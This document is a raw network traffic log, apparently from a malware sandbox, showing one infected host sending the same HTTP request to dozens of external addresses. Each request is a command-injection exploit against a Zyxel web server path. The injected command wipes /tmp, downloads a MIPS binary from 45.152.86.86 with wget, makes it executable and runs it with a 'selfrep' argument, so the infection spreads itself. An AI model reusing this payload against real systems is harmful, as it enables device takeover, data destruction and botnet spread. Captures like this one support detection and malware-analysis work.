                                        Mar 31, 2024 09:22:59.999573946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9743192.168.2.2358378108.210.144.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999631882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9744192.168.2.2351892110.17.94.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999669075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9745192.168.2.2333584204.44.15.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999712944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9746192.168.2.2359730185.203.30.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999804020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9747192.168.2.2351868123.152.135.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999826908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9748192.168.2.2345456211.202.170.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999881029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9749192.168.2.2358802218.252.221.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999914885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9750192.168.2.23583525.180.235.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999969006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9751192.168.2.2340546130.25.49.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000000000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9752192.168.2.2340856202.51.227.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000052929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9753192.168.2.233472427.33.200.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000096083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9754192.168.2.2339286101.112.43.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000121117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9755192.168.2.2353718178.236.175.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000184059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9756192.168.2.2334340113.166.14.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000224113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9757192.168.2.235075296.30.18.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000277042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9758192.168.2.235195450.65.160.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000333071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9759192.168.2.2349028175.130.161.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000365019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9760192.168.2.2345456178.160.244.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000425100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9761192.168.2.2334244187.30.143.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000453949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9762192.168.2.2347852103.250.231.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000514030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9763192.168.2.2354508117.234.172.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000550985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9764192.168.2.2335494212.135.228.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000591040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9765192.168.2.234123444.191.188.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000622034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9766192.168.2.2357992118.144.74.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000679016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9767192.168.2.234700286.150.166.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000722885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9768192.168.2.234003697.40.222.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000775099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9769192.168.2.2345626147.0.220.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000818968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9770192.168.2.2341358200.87.43.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000858068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9771192.168.2.2333140101.188.239.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000912905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9772192.168.2.234457885.13.170.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.000957966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9773192.168.2.2341318142.185.97.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001003981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9774192.168.2.2349982180.249.100.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001066923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9775192.168.2.2346964167.218.189.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001121044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9776192.168.2.235110227.140.51.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001173973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9777192.168.2.235088413.95.110.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001202106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9778192.168.2.234429272.14.58.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001247883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9779192.168.2.2356834187.43.174.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001287937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9780192.168.2.2339432201.160.71.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001348019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9781192.168.2.2336948178.91.171.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001399040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9782192.168.2.233733291.3.166.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001434088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9783192.168.2.2344530205.202.69.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001480103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9784192.168.2.2357078150.167.63.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001527071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9785192.168.2.2346834126.117.243.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001564026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9786192.168.2.2358402197.42.142.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001607895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9787192.168.2.234010074.125.66.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001652956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9788192.168.2.235665070.201.14.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001715899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9789192.168.2.2343592182.46.144.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001765966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9790192.168.2.233342232.103.57.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001826048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9791192.168.2.234954046.184.10.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001859903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9792192.168.2.2337314173.167.58.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001919031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9793192.168.2.2342796122.109.162.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.001946926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9794192.168.2.2345806180.153.182.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002007961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9795192.168.2.234193260.172.226.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002043009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9796192.168.2.233605298.164.16.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002121925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9797192.168.2.2340090192.94.163.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002150059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9798192.168.2.235774490.194.93.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002207041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9799192.168.2.2357630146.38.122.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002273083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9800192.168.2.2344124223.59.197.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002310038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9801192.168.2.2352206108.209.134.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002365112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9802192.168.2.233808053.128.67.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002410889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9803192.168.2.2357936110.52.110.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002468109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9804192.168.2.2343078106.138.52.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002499104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9805192.168.2.2342092152.55.6.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002546072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9806192.168.2.233757252.186.106.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002600908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9807192.168.2.2360512219.191.64.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002656937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9808192.168.2.2349900196.145.95.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002711058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9809192.168.2.2342914217.122.2.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:23:00.002746105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9810192.168.2.234014071.6.44.208443
                                        TimestampBytes transferredDirectionData
